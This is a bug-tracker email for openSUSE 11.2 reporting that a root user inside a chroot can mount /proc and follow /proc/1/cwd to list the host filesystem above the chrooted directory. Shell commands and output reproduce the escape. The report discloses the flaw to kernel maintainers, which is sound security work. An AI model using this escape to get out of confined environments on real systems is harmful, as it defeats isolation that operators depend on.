http://bugzilla.novell.com/show_bug.cgi?id=610554 http://bugzilla.novell.com/show_bug.cgi?id=610554#c0 Summary: easy way to leave chroot Classification: openSUSE Product: openSUSE 11.2 Version: Final Platform: HP OS/Version: openSUSE 11.2 Status: NEW Severity: Major Priority: P5 - None Component: Kernel AssignedTo: kernel-maintainers@forge.provo.novell.com ReportedBy: alavrentiev@yandex.ru QAContact: qa@suse.de Found By: --- Blocker: --- User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 there is a simple way to leave chrooted environment. just mount /proc filesystem and reference to pid/cwd, for example. Reproducible: Always Steps to Reproduce: vz15:/ # uname -a Linux vz15 2.6.31.12-0.2-default #1 SMP 2010-03-16 21:25:39 +0100 x86_64 x86_64 x86_64 GNU/Linux vz15:/ # cat /etc/SuSE-release openSUSE 11.2 (x86_64) VERSION = 11.2 vz15:/ # ls -al /ve/private/ total 20 drwxr-xr-x 5 root root 4096 2010-03-30 14:47 . drwxr-xr-x 11 root root 4096 2010-03-30 14:41 .. drwxr-xr-x 19 root root 4096 2009-10-08 16:55 400 drwxr-xr-x 19 root root 4096 2009-11-16 14:54 401 drwxr-xr-x 21 root root 4096 2010-06-01 13:24 suse-11.2 vz15:/ # cd /ve/private/suse-11.2/ vz15:/ve/private/suse-11.2 # chroot . vz15:/> ls -al /ve/private/ /bin/ls: cannot access /ve/private/: No such file or directory vz15:/> mount -t proc none /proc vz15:/> ls -ald /proc/1/cwd lrwxrwxrwx 1 root root 0 2010-05-12 09:40 /proc/1/cwd -> / vz15:/> ls -ald /proc/1/cwd/ve/private/ drwxr-xr-x 5 root root 4096 2010-03-30 10:47 /proc/1/cwd/ve/private/ vz15:/> ls -al /proc/1/cwd/ve/private/ total 20 drwxr-xr-x 5 root root 4096 2010-03-30 10:47 . drwxr-xr-x 11 root root 4096 2010-03-30 10:41 .. drwxr-xr-x 19 root root 4096 2009-10-08 12:55 400 drwxr-xr-x 19 root root 4096 2009-11-16 11:54 401 drwxr-xr-x 21 root root 4096 2010-06-01 09:24 suse-11.2 Actual Results: filesystem above chrooted directory is available. Expected Results: filesystem above chrooted directory is prohibited. -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.